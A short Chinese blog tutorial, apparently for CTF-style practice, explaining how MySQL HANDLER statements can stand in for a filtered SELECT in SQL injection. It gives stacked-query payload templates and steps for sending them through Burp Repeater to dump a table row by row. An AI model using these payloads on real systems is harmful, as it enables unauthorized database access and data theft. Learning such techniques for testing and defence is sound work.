🏆今日学习目标：🍀了解通过利用 handler 语句完成注入的方法✅创作者：贤鱼

@TOC

原理

总所周知，在 sql 注入中可以使用 select，可如果题目中过滤了 select 该怎么办呢？我们可以使用==handler，这个语句可以一行一行显示库中内容==

模板

handler user open;handler user read;读出什么输出什么

handler user read first [where username='admin'];handler user read next [where username='admin']; -- [] 中的内容意味着可加可不加

使用方法

首先抓包，然后鼠标右键 send to repeater

用';闭合前段，然后输入==handler user open;handler user read first;handler user read next;==,这里 first 时代表第一个内容，next 是后面的内容，user 是表名，我们通过多次用 handler user read next 可以看到表中所有的内容，所以多次复制 handler user read next；就可以了

🏆结束语网络安全专栏的内容会持续更新，各位如果有需要的话欢迎订阅持续关注！